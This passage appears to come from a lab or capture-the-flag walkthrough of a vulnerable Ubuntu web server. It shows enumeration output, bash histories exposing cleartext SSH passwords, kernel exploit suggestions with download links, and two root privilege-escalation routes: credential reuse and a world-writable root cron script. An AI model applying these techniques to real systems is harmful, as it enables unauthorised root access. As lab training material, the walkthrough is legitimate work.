drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  412 Jun  3  2016 audio.png
-rw-r--r-- 1 root root  368 Jun  3  2016 dashicon-edit.png
-rw-r--r-- 1 root root  339 Jun  3  2016 dashicon-no.png
-rw-r--r-- 1 root root 8.0K Jun  3  2016 embedded.png
-rw-r--r-- 1 root root  447 Jun  3  2016 gallery-2x.png
-rw-r--r-- 1 root root  379 Jun  3  2016 gallery.png
-rw-r--r-- 1 root root  603 Jun  3  2016 more-2x.png
-rw-r--r-- 1 root root  414 Jun  3  2016 more.png
-rw-r--r-- 1 root root  835 Jun  3  2016 pagebreak-2x.png
-rw-r--r-- 1 root root 1.2K Jun  3  2016 pagebreak.png
-rw-r--r-- 1 root root  440 Jun  3  2016 playlist-audio.png
-rw-r--r-- 1 root root  290 Jun  3  2016 playlist-video.png
-rw-r--r-- 1 root root  363 Jun  3  2016 video.png

/var/www/https/blogblog/wp-includes/js/tinymce/themes:
total 12K
drwxr-xr-x 3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 7 root root 4.0K Jun  3  2016 ..
drwxr-xr-x 2 root root 4.0K Jun  3  2016 modern

/var/www/https/blogblog/wp-includes/js/tinymce/themes/modern:
total 32K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  15K Jun  3  2016 theme.js
-rw-r--r-- 1 root root 6.3K Jun  3  2016 theme.min.js

/var/www/https/blogblog/wp-includes/js/tinymce/utils:
total 32K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 7 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 2.0K Jun  3  2016 editable_selects.js
-rw-r--r-- 1 root root 5.7K Jun  3  2016 form_utils.js
-rw-r--r-- 1 root root 3.9K Jun  3  2016 mctabs.js
-rw-r--r-- 1 root root 5.7K Jun  3  2016 validate.js

/var/www/https/blogblog/wp-includes/pomo:
total 52K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 12 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 2.6K Jun  3  2016 entry.php
-rw-r--r--  1 root root 7.5K Jun  3  2016 mo.php
-rw-r--r--  1 root root  12K Jun  3  2016 po.php
-rw-r--r--  1 root root 4.9K Jun  3  2016 streams.php
-rw-r--r--  1 root root 8.2K Jun  3  2016 translations.php

/var/www/https/blogblog/wp-includes/SimplePie:
total 384K
drwxr-xr-x  9 root root 4.0K Jun  3  2016 .
drwxr-xr-x 12 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 3.6K Jun  3  2016 Author.php
drwxr-xr-x  2 root root 4.0K Jun  3  2016 Cache
-rw-r--r--  1 root root 4.2K Jun  3  2016 Cache.php
-rw-r--r--  1 root root 4.5K Jun  3  2016 Caption.php
-rw-r--r--  1 root root 3.7K Jun  3  2016 Category.php
drwxr-xr-x  3 root root 4.0K Jun  3  2016 Content
-rw-r--r--  1 root root 3.3K Jun  3  2016 Copyright.php
-rw-r--r--  1 root root 2.3K Jun  3  2016 Core.php
-rw-r--r--  1 root root 3.7K Jun  3  2016 Credit.php
drwxr-xr-x  3 root root 4.0K Jun  3  2016 Decode
-rw-r--r--  1 root root  27K Jun  3  2016 Enclosure.php
-rw-r--r--  1 root root 2.2K Jun  3  2016 Exception.php
-rw-r--r--  1 root root 9.5K Jun  3  2016 File.php
-rw-r--r--  1 root root 8.4K Jun  3  2016 gzdecode.php
drwxr-xr-x  2 root root 4.0K Jun  3  2016 HTTP
-rw-r--r--  1 root root  28K Jun  3  2016 IRI.php
-rw-r--r--  1 root root  96K Jun  3  2016 Item.php
-rw-r--r--  1 root root  11K Jun  3  2016 Locator.php
-rw-r--r--  1 root root  51K Jun  3  2016 Misc.php
drwxr-xr-x  2 root root 4.0K Jun  3  2016 Net
drwxr-xr-x  2 root root 4.0K Jun  3  2016 Parse
-rw-r--r--  1 root root  12K Jun  3  2016 Parser.php
-rw-r--r--  1 root root 3.4K Jun  3  2016 Rating.php
-rw-r--r--  1 root root 5.9K Jun  3  2016 Registry.php
-rw-r--r--  1 root root 3.8K Jun  3  2016 Restriction.php
-rw-r--r--  1 root root  16K Jun  3  2016 Sanitize.php
-rw-r--r--  1 root root  21K Jun  3  2016 Source.php
drwxr-xr-x  3 root root 4.0K Jun  3  2016 XML

/var/www/https/blogblog/wp-includes/SimplePie/Cache:
total 48K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 3.4K Jun  3  2016 Base.php
-rw-r--r-- 1 root root 4.7K Jun  3  2016 DB.php
-rw-r--r-- 1 root root 4.4K Jun  3  2016 File.php
-rw-r--r-- 1 root root 5.1K Jun  3  2016 Memcache.php
-rw-r--r-- 1 root root  12K Jun  3  2016 MySQL.php

/var/www/https/blogblog/wp-includes/SimplePie/Content:
total 12K
drwxr-xr-x 3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
drwxr-xr-x 2 root root 4.0K Jun  3  2016 Type

/var/www/https/blogblog/wp-includes/SimplePie/Content/Type:
total 16K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 8.0K Jun  3  2016 Sniffer.php

/var/www/https/blogblog/wp-includes/SimplePie/Decode:
total 12K
drwxr-xr-x 3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
drwxr-xr-x 2 root root 4.0K Jun  3  2016 HTML

/var/www/https/blogblog/wp-includes/SimplePie/Decode/HTML:
total 28K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  17K Jun  3  2016 Entities.php

/var/www/https/blogblog/wp-includes/SimplePie/HTTP:
total 20K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  11K Jun  3  2016 Parser.php

/var/www/https/blogblog/wp-includes/SimplePie/Net:
total 16K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 7.4K Jun  3  2016 IPv6.php

/var/www/https/blogblog/wp-includes/SimplePie/Parse:
total 28K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  20K Jun  3  2016 Date.php

/var/www/https/blogblog/wp-includes/SimplePie/XML:
total 12K
drwxr-xr-x 3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
drwxr-xr-x 2 root root 4.0K Jun  3  2016 Declaration

/var/www/https/blogblog/wp-includes/SimplePie/XML/Declaration:
total 16K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 7.0K Jun  3  2016 Parser.php

/var/www/https/blogblog/wp-includes/Text:
total 24K
drwxr-xr-x  3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 12 root root 4.0K Jun  3  2016 ..
drwxr-xr-x  4 root root 4.0K Jun  3  2016 Diff
-rw-r--r--  1 root root  12K Jun  3  2016 Diff.php

/var/www/https/blogblog/wp-includes/Text/Diff:
total 24K
drwxr-xr-x 4 root root 4.0K Jun  3  2016 .
drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
drwxr-xr-x 2 root root 4.0K Jun  3  2016 Engine
drwxr-xr-x 2 root root 4.0K Jun  3  2016 Renderer
-rw-r--r-- 1 root root 6.6K Jun  3  2016 Renderer.php

/var/www/https/blogblog/wp-includes/Text/Diff/Engine:
total 48K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 4 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  16K Jun  3  2016 native.php
-rw-r--r-- 1 root root 5.1K Jun  3  2016 shell.php
-rw-r--r-- 1 root root 8.2K Jun  3  2016 string.php
-rw-r--r-- 1 root root 2.2K Jun  3  2016 xdiff.php

/var/www/https/blogblog/wp-includes/Text/Diff/Renderer:
total 16K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 4 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 5.5K Jun  3  2016 inline.php

/var/www/https/blogblog/wp-includes/theme-compat:
total 36K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 12 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 4.2K Jun  3  2016 comments.php
-rw-r--r--  1 root root 5.2K Jun  3  2016 comments-popup.php
-rw-r--r--  1 root root 1.2K Jun  3  2016 footer.php
-rw-r--r--  1 root root 1.8K Jun  3  2016 header.php
-rw-r--r--  1 root root 3.9K Jun  3  2016 sidebar.php


### INTERESTING FILES ####################################
[[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl


[[-] Installed compilers:
ii  g++                                4:5.3.1-1ubuntu1                i386         GNU C++ compiler
ii  g++-5                              5.3.1-14ubuntu2.1               i386         GNU C++ compiler
ii  gcc                                4:5.3.1-1ubuntu1                i386         GNU C compiler
ii  gcc-5                              5.3.1-14ubuntu2.1               i386         GNU C compiler


[[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 2908 Jun  4  2016 /etc/passwd
-rw-rw-r-- 1 root root 1253 Jun  4  2016 /etc/group
-rw-r--r-- 1 root root 575 Oct 22  2015 /etc/profile
-rw-r----- 1 root shadow 4518 Jun  5  2016 /etc/shadow


[[-] SUID files:
-rwsr-xr-x 1 root root 36288 Mar 29  2016 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 39560 Mar 29  2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 159852 Mar 30  2016 /usr/bin/sudo
-rwsr-xr-x 1 root root 48264 Mar 29  2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 18216 Jan 17  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 36288 Mar 29  2016 /usr/bin/newgidmap
-rwsr-sr-x 1 daemon daemon 50748 Jan 14  2016 /usr/bin/at
-rwsr-xr-x 1 root root 53128 Mar 29  2016 /usr/bin/passwd
-rwsr-xr-x 1 root root 34680 Mar 29  2016 /usr/bin/newgrp
-rwsr-xr-x 1 root root 78012 Mar 29  2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 22268 Apr 29  2016 /usr/bin/ubuntu-core-launcher
-rwsr-xr-x 1 root root 513528 Apr 16  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5480 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13960 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 38300 Apr 19  2016 /usr/lib/i386-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 46436 Apr  1  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9760 Jul 26  2015 /usr/lib/authbind/helper
-rwsr-xr-x 1 root root 34812 Apr 13  2016 /bin/mount
-rwsr-xr-x 1 root root 26492 Apr 13  2016 /bin/umount
-rwsr-xr-x 1 root root 38932 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 30112 Mar 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 43316 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 38900 Mar 29  2016 /bin/su


[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 513528 Apr 16  2016 /usr/lib/openssh/ssh-keysign


[[-] GUID files:
-rwxr-sr-x 1 root shadow 22000 Mar 29  2016 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 50748 Jan 14  2016 /usr/bin/at
-rwxr-sr-x 1 root ssh 427536 Apr 16  2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 61276 Mar 29  2016 /usr/bin/chage
-rwxr-sr-x 1 root tty 26356 Apr 13  2016 /usr/bin/wall
-rwxr-sr-x 1 root crontab 38996 Apr  5  2016 /usr/bin/crontab
-rwxr-sr-x 1 root utmp 464152 Feb  7  2016 /usr/bin/screen
-rwxr-sr-x 1 root utmp 5480 Mar 11  2016 /usr/lib/i386-linux-gnu/utempter/utempter
-r-xr-sr-x 1 root postdrop 17716 Apr 13  2016 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 13636 Apr 13  2016 /usr/sbin/postdrop
-rwxr-sr-x 1 root shadow 38664 Mar 16  2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 38684 Mar 16  2016 /sbin/pam_extrausers_chkpwd


[+] Possibly interesting GUID files:
-rwxr-sr-x 1 root ssh 427536 Apr 16  2016 /usr/bin/ssh-agent


[[-] World-writable files (excluding /proc and /sys):
-rw-rw-rw- 1 www-data www-data 1885 Jul 22 21:38 /var/www/https/blogblog/wp-content/uploads/malicous.zip
-rw-rw-rw- 1 www-data www-data 1524 Jul 22 21:27 /var/www/https/blogblog/wp-content/uploads/RKmIVQPEJZ.zip
-rwxrwxrwx 1 www www 0 Jun  3  2016 /etc/authbind/byport/80
-rwxrwxrwx 1 root root 51 Jun  3  2016 /usr/local/sbin/cron-logrotate.sh


[[-] NFS displaying partitions and filesystems - you need to check if exotic filesystems
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point>   <type>  <options>       <dump>  <pass>
# / was on /dev/sda1 during installation
UUID=9bdd8a90-41cc-484f-8c75-0249b9103a31 /               ext4    errors=remount-ro 0       1
# swap was on /dev/sda5 during installation
UUID=9584ec4a-8708-4802-96e6-9e3067074554 none            swap    sw              0       0


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 7788 Jun  3  2016 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 25 Jul 22 17:31 /etc/resolv.conf
-rw-r--r-- 1 root root 5961 Jun  4  2016 /etc/vsftpd.conf
-rw-r--r-- 1 root root 34 Jan 27  2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 1260 Mar 16  2016 /etc/ucf.conf
-rw-r--r-- 1 root root 2584 Feb 18  2016 /etc/gai.conf
-rw-r--r-- 1 root root 6595 Jun 23  2015 /etc/overlayroot.conf
-rw-r--r-- 1 root root 771 Mar  6  2015 /etc/insserv.conf
-rw-r--r-- 1 root root 191 Jan 18  2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 1257 Jun  3  2016 /etc/inetd.conf
-rw-r--r-- 1 root root 26716 Jul 30  2015 /etc/dnsmasq.conf
-rw-r--r-- 1 root root 552 Mar 16  2016 /etc/pam.conf
-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 604 Jul  2  2015 /etc/deluser.conf
-rw-r--r-- 1 root root 92 Oct 22  2015 /etc/host.conf
-rw-r--r-- 1 root root 2227 Jun  3  2016 /etc/sysctl.conf
-rw-r--r-- 1 root root 703 May  6  2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 144 Jun  3  2016 /etc/kernel-img.conf
-rw-r--r-- 1 root root 967 Oct 30  2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 1371 Jan 27  2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 100 Nov 25  2015 /etc/sos.conf
-rw-r--r-- 1 root root 2969 Nov 10  2015 /etc/debconf.conf
-rw-r--r-- 1 root root 497 May  4  2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 3028 Apr 20  2016 /etc/adduser.conf


[[-] Current user's history files:
-rw-r--r-- 1 root root 9 Jun  5  2016 /home/zoe/.bash_history


[[-] Location and contents (if accessible) of .bash_history file(s):
/home/MFrei/.bash_history
exit
/home/Sam/.bash_history
exit
/home/CCeaser/.bash_history
free
exit
/home/DSwanger/.bash_history
exit
/home/JBare/.bash_history
exit
/home/mel/.bash_history
exit
/home/jess/.bash_history
exit
/home/MBassin/.bash_history
exit
/home/kai/.bash_history
exit
/home/elly/.bash_history
exit
/home/Drew/.bash_history
exit
/home/JLipps/.bash_history
exit
exit
/home/jamie/.bash_history
top
ps aux
exit
/home/Taylor/.bash_history
exit
id
/home/peter/.bash_history
/home/SHayslett/.bash_history
exit
/home/JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
/home/AParnell/.bash_history
exit
/home/CJoo/.bash_history
exit
/home/Eeth/.bash_history
exit
/home/RNunemaker/.bash_history
exit
/home/SHAY/.bash_history
exit
/home/ETollefson/.bash_history
exit
/home/IChadwick/.bash_history
exit
/home/LSolum2/.bash_history
exit
whoami
/home/SStroud/.bash_history
exit
/home/LSolum/.bash_history
exit
/home/NATHAN/.bash_history
exit
/home/zoe/.bash_history
top
exit


[[-] Any interesting mail in /var/mail:
total 64
drwxrwsr-x  2 root     mail  4096 Jul 22 22:10 .
drwxr-xr-x 16 root     root  4096 Jun  6  2016 ..
-rw-r--r--  1 root     mail  1181 Jul 22 22:10 root
-rw-------  1 www-data mail 45193 Jul 22 18:14 www-data


[+] We can read /var/mail/root! (snippet below)

From zoe@red.localdomain  Sun Jul 22 22:10:00 2018
Return-Path: <zoe@red.localdomain>
X-Original-To: root
Delivered-To: root@red.localdomain
Received: by red.localdomain (Postfix, from userid 1026)
	id DAECA34E6; Sun, 22 Jul 2018 22:10:00 +0100 (BST)
To: root@red.localdomain
From: zoe@red.localdomain
Auto-Submitted: auto-generated


### SCAN COMPLETE ####################################

==========================================================================

$./Linux-exploit-suggester.sh

Available information:

Kernel version: 4.4.0
Architecture: i686
Distribution: ubuntu
Distribution version: ..
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

70 kernel space exploits
32 user space exploits

Possible Exploits:

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [N/A] target_offset

   Details: https://www.exploit-db.com/exploits/40049/
   Tags: ubuntu=16.04{kernel:4.4.0-21}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip
   Comments: ip_tables.ko needs to be loaded

[+] [CVE-2016-4557] double-fdput()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE

   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
   Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/cve-2017-7308/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-16995] eBPF_verifier

   Details: https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor
   Tags: ubuntu=16.04.4{kernel:4.4.0-116}
   Download URL: https://www.exploit-db.com/download/44298
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Tags: ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/cve-2017-1000112/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2009-1185] udev 2

   Details: https://www.exploit-db.com/exploits/8478/
   Download URL: https://www.exploit-db.com/download/8478
   Comments: SSH access to non privileged user is needed. Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed

===============================================================================================

root@Security-Audit-01:~# searchsploit 16.04
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16. | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spo | exploits/linux/local/40054.c
Google Chrome + Fedora 25 / Ubuntu 16. | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest  | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubu | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14. | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Referenc | exploits/linux/dos/39773.txt
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF | exploits/linux/local/40759.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x6 | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'd | exploits/linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) -  | exploits/linux/local/40489.txt
Linux Kernel < 4.4.0-116 (Ubuntu 16.04 | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04  | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 ( | exploits/linux/local/43418.c
censura 1.16.04 - Blind SQL Injection  | exploits/php/webapps/9129.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result

===============================================================================================

root@Security-Audit-01:~# searchsploit Linux 4.4.0
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Linux 4.4.0 < 4.4.0-53 - AF_PACKET cho | exploits/linux/local/44696.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Dou | exploits/linux/dos/41457.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Dou | exploits/linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x6 | exploits/linux_x86-64/local/40049.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04 | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04  | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 ( | exploits/linux/local/43418.c
--------------------------------------- ----------------------------------------
Shellcodes: No Result



===================================================================================================================================
Step 4. Privesc to root
===================================================================================================================================

Method 1
---------
=> A world readable file "/home/JKanode/.bash_history" contains credentials in clear text (peter & JKnode)
   + Sudo ALL (ALL): ALL for the peter account 

Method 2
---------
=> A cron job named "logrotate" and owned by root executes the script "cron-logrotate.sh" every 5 minutes 
   + this script is world writable.